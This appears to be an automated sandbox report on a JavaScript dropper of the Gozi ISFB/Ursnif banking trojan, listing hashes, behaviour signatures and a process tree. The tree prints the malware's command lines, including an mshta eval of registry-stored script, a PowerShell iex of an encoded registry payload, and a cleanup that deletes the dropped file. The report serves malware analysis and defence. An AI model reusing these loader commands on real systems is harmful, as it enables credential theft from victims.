Overview

overview

10

Static

static

my_present...c1l.js

windows7_x64

10

my_present...c1l.js

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    133s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    14-05-2020 09:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    my_presentation_c1l.js

  • Size

    3.8MB

  • MD5

    763c2375aea17fffc6c0e24c2808570c

  • SHA1

    10f7b2d55a9a10902b91fb1c0e632e7db257006e

  • SHA256

    e4276d8f476bc00d0e1b946a5e4da025575753c7c1b4bbff3408f8a07461f72d

  • SHA512

    9a59f0c887368105ff7a5a329a775ff107a7e9ed306d56e4471aa4f7258b581ecc7960edb0ce89dbc411b23244fb45e561b4e2debbd71699df77467e2bd68beb

Score
10/10
bankertrojangozi_ifsbursnifspyware

Malware Config

Signatures

  • Suspicious use of SetThreadContext 6 IoCs
  • Program crash 1 IoCs
  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

    bankertrojangozi_ifsb
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Suspicious use of WriteProcessMemory 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1672 IoCs
  • Ursnif, Dreambot

    Ursnif is a variant of the Gozi IFSB with more capabilities.

    bankertrojanursnif
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Checks whether UAC is enabled 3 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: MapViewOfSection
    • Suspicious behavior: EnumeratesProcesses
    PID:3012
    • C:\Windows\system32\wscript.exe
      wscript.exe C:\Users\Admin\AppData\Local\Temp\my_presentation_c1l.js
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3656
      • C:\Windows\System32\regsvr32.exe
        "C:\Windows\System32\regsvr32.exe" -s C:\Users\Admin\AppData\Local\Temp\\zPNqVPAAFG.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2220
        • C:\Windows\SysWOW64\regsvr32.exe
          -s C:\Users\Admin\AppData\Local\Temp\\zPNqVPAAFG.txt
          4⤵
          • Loads dropped DLL
          PID:2244
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 824
            5⤵
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            PID:2548
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\28FFF86C-67D8-9AFA-31DC-8B6EF5D0EF82\\AxInrvps'));if(!window.flag)close()</script>"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:936
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\28FFF86C-67D8-9AFA-31DC-8B6EF5D0EF82").AppCbcd))
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: MapViewOfSection
        • Suspicious behavior: EnumeratesProcesses
        PID:2716
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h231hspb\h231hspb.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3656
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9224.tmp" "c:\Users\Admin\AppData\Local\Temp\h231hspb\CSC2E471E8C8BAC418D84FABFF529FF8C.TMP"
            5⤵
              PID:3404
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vtkhm5l4\vtkhm5l4.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3388
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9418.tmp" "c:\Users\Admin\AppData\Local\Temp\vtkhm5l4\CSCDD1C7A9C33C740D0947D7F14B13C2190.TMP"
              5⤵
                PID:2196
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\zPNqVPAAFG.txt"
          2⤵
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          • Suspicious behavior: MapViewOfSection
          PID:3180
          • C:\Windows\system32\PING.EXE
            ping localhost -n 5
            3⤵
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Runs ping.exe
            PID:3048
        • C:\Windows\system32\cmd.exe
          cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\A564.bi1"
          2⤵
            PID:2052
            • C:\Windows\system32\nslookup.exe
              nslookup myip.opendns.com resolver1.opendns.com
              3⤵
                PID:648
            • C:\Windows\system32\cmd.exe
              cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\A55C.bi1"
              2⤵
                PID:2196
                • C:\Windows\system32\nslookup.exe
                  nslookup myip.opendns.com resolver1.opendns.com
                  3⤵
                    PID:2852
                • C:\Windows\system32\cmd.exe
                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A55C.bi1"
                  2⤵
                    PID:516
                  • C:\Windows\system32\cmd.exe
                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\A564.bi1"
                    2⤵
                      PID:3576
                    • C:\Program Files\Windows Mail\WinMail.exe
                      "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
                      2⤵
                        PID:4040
                    • C:\Windows\System32\RuntimeBroker.exe
                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                      1⤵
                        PID:3460
                      • C:\Program Files\Internet Explorer\iexplore.exe
                        "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                        1⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of FindShellTrayWindow
                        • Checks whether UAC is enabled
                        PID:3920
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3920 CREDAT:82945 /prefetch:2
                          2⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of SetWindowsHookEx
                          • Checks whether UAC is enabled
                          PID:4004
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3920 CREDAT:82950 /prefetch:2
                          2⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of SetWindowsHookEx
                          • Checks whether UAC is enabled
                          PID:3076

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
                        Download Submit

                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_D9817BD5013875AD517DA73475345203
                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\A55C.bi1
                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\A55C.bi1
                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\A564.bi1
                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\A564.bi1
                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\RES9224.tmp
                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\RES9418.tmp
                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\h231hspb\h231hspb.dll
                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\vtkhm5l4\vtkhm5l4.dll
                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\zPNqVPAAFG.txt
                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\h231hspb\CSC2E471E8C8BAC418D84FABFF529FF8C.TMP
                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\h231hspb\h231hspb.0.cs
                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\h231hspb\h231hspb.cmdline
                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\vtkhm5l4\CSCDD1C7A9C33C740D0947D7F14B13C2190.TMP
                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\vtkhm5l4\vtkhm5l4.0.cs
                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\vtkhm5l4\vtkhm5l4.cmdline
                        Download Submit

                      • \Users\Admin\AppData\Local\Temp\zPNqVPAAFG.txt
                        Download Submit

                      • memory/2548-24-0x00000000058B0000-0x00000000058B1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/2548-23-0x0000000004EC0000-0x0000000004EC1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/2716-13-0x00000274E9A50000-0x00000274E9B01000-memory.dmp

                        Filesize

                        708KB

                        Download

                      • memory/3012-19-0x0000000004E60000-0x0000000004F11000-memory.dmp

                        Filesize

                        708KB

                        Download

                      • memory/3012-17-0x0000000004F20000-0x0000000004FD1000-memory.dmp

                        Filesize

                        708KB

                        Download

                      • memory/3012-15-0x0000000004E60000-0x0000000004F11000-memory.dmp

                        Filesize

                        708KB

                        Download

                      • memory/3012-12-0x0000000000910000-0x0000000000911000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/3048-21-0x0000022A7AAA0000-0x0000022A7AAA1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/3180-22-0x0000022A6A520000-0x0000022A6A5D1000-memory.dmp

                        Filesize

                        708KB

                        Download

                      • memory/3180-16-0x0000022A68180000-0x0000022A68181000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/3460-14-0x0000014C98D60000-0x0000014C98D61000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/3920-18-0x00000187C7C70000-0x00000187C7C71000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/4040-37-0x000002169FD80000-0x000002169FD81000-memory.dmp

                        Filesize

                        4KB

                        Download